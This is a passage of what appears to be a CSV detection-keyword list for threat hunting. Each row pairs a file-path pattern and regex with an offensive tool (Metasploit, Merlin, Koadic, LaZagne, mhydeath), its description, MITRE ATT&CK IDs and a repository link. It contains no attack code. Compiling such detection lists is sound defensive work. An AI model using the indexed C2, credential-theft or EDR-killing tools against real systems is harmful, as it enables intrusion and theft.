Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/man_in_the_browser/*.rb*",".{0,1000}\/man_in_the_browser\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*/manage/exec_cmd*",".{0,1000}\/manage\/exec_cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/Management/C2/*",".{0,1000}\/Management\/C2\/.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*/manjusaka/plugins*",".{0,1000}\/manjusaka\/plugins.{0,1000}","offensive_tool_keyword","cobaltstrike","Chinese clone of cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/YDHCUI/manjusaka","1","1","N/A","10","10","747","140","2023-05-09T03:31:53Z","2022-03-18T08:16:04Z" "*/MANSPIDER.git*",".{0,1000}\/MANSPIDER\.git.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","1","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*/manspider_*.log*",".{0,1000}\/manspider_.{0,1000}\.log.{0,1000}","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","10","926","126","2024-02-27T16:16:14Z","2020-03-18T13:27:20Z" "*/manspider_output*.txt",".{0,1000}\/manspider_output.{0,1000}\.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/manspiderDump*",".{0,1000}\/manspiderDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/Mara.git*",".{0,1000}\/Mara\.git.{0,1000}","offensive_tool_keyword","Mara","Mara is a userland pty/tty sniffer","T1055 - T1106 - T1059","TA0002 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/io-tl/Mara/","1","1","N/A","9","1","50","6","2023-12-22T16:52:47Z","2022-08-02T13:02:41Z" "*/masky.py*",".{0,1000}\/masky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/master/GPSCoordinates/*",".{0,1000}\/master\/GPSCoordinates\/.{0,1000}","offensive_tool_keyword","GPSCoordinates","Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled","T1018 - T1059.001","TA0001 - TA0002","N/A","N/A","Reconnaissance","https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/master/JunctionFolder/*",".{0,1000}\/master\/JunctionFolder\/.{0,1000}","offensive_tool_keyword","JunctionFolder","Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.","T1547.001 - T1574.001 - T1204.002","TA0005 - TA0004","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/master/PhantomService/*",".{0,1000}\/master\/PhantomService\/.{0,1000}","offensive_tool_keyword","PhantomService","Searches for and removes non-ASCII services that can't be easily removed by built-in Windows tools","T1050.005 - T1055.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/PhantomService","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*/maxdb-info.nse*",".{0,1000}\/maxdb\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mcafee-epo-agent.nse*",".{0,1000}\/mcafee\-epo\-agent\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/membase-brute.nse*",".{0,1000}\/membase\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/membase-http-info.nse*",".{0,1000}\/membase\-http\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/memcached-info.nse*",".{0,1000}\/memcached\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/memodipper64*",".{0,1000}\/memodipper64.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/memory_exec.py*",".{0,1000}\/memory_exec\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/memorydump.py*",".{0,1000}\/memorydump\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*/mempodipper.c*",".{0,1000}\/mempodipper\.c.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/MemReader_BoF/*",".{0,1000}\/MemReader_BoF\/.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","10","10","27","4","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z" "*/merlin.dll*",".{0,1000}\/merlin\.dll.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*/merlin.dll*",".{0,1000}\/merlin\.dll.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*/merlin.git*",".{0,1000}\/merlin\.git.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/merlin.html*",".{0,1000}\/merlin\.html.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/merlin.py*",".{0,1000}\/merlin\.py.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*/merlin/agent_code/*",".{0,1000}\/merlin\/agent_code\/.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","77","12","2024-04-24T13:23:09Z","2021-01-25T12:36:46Z" "*/merlin/data/modules/*",".{0,1000}\/merlin\/data\/modules\/.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/merlinAgent-*.exe*",".{0,1000}\/merlinAgent\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/merlin-agent.git*",".{0,1000}\/merlin\-agent\.git.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/merlin-agent/tarball/v*",".{0,1000}\/merlin\-agent\/tarball\/v.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/merlin-agent/v2/cli*",".{0,1000}\/merlin\-agent\/v2\/cli.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/merlin-agent/v2/core*",".{0,1000}\/merlin\-agent\/v2\/core.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/merlin-agent/zipball/v*",".{0,1000}\/merlin\-agent\/zipball\/v.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/merlin-agent-dll.git*",".{0,1000}\/merlin\-agent\-dll\.git.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*/merlin-agent-dll/*",".{0,1000}\/merlin\-agent\-dll\/.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","10","10","49","13","2024-04-23T04:53:57Z","2021-04-17T16:58:24Z" "*/merlinAgent-Linux-x64*",".{0,1000}\/merlinAgent\-Linux\-x64.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*/met_inject.py*",".{0,1000}\/met_inject\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/Metasploit*",".{0,1000}\/Metasploit.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://www.metasploit.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/metasploit.go*",".{0,1000}\/metasploit\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/metasploit/*",".{0,1000}\/metasploit\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/metasploit-framework/embedded/framework*",".{0,1000}\/metasploit\-framework\/embedded\/framework.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/metasploit-info.nse*",".{0,1000}\/metasploit\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/metasploit-msgrpc-brute.nse*",".{0,1000}\/metasploit\-msgrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/metasploit-xmlrpc-brute.nse*",".{0,1000}\/metasploit\-xmlrpc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/metatwin.git*",".{0,1000}\/metatwin\.git.{0,1000}","offensive_tool_keyword","metatwin","The project is designed as a file resource cloner. Metadata including digital signature is extracted from one file and injected into another","T1553.002 - T1114.001 - T1564.003","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/threatexpress/metatwin","1","1","N/A","9","4","319","74","2022-05-18T18:32:51Z","2017-10-08T13:26:00Z" "*/meterpreter*",".{0,1000}\/meterpreter.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/meterpreter/reverse_tcp*",".{0,1000}\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*/MFASweep.git*",".{0,1000}\/MFASweep\.git.{0,1000}","offensive_tool_keyword","MFASweep","A tool for checking if MFA is enabled on multiple Microsoft Services","T1595 - T1595.002 - T1078.003","TA0006 - TA0009","N/A","N/A","Exploitation tools","https://github.com/dafthack/MFASweep","1","1","N/A","9","10","1192","164","2024-01-31T22:52:58Z","2020-09-22T16:25:03Z" "*/mhydeath.git*",".{0,1000}\/mhydeath\.git.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*/mhydeath.sln*",".{0,1000}\/mhydeath\.sln.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*/mhydeath/main.cpp*",".{0,1000}\/mhydeath\/main\.cpp.{0,1000}","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","4","345","63","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*/michaelweber/Macrome*",".{0,1000}\/michaelweber\/Macrome.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*/micr0%20shell.py*",".{0,1000}\/micr0\%20shell\.py.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - 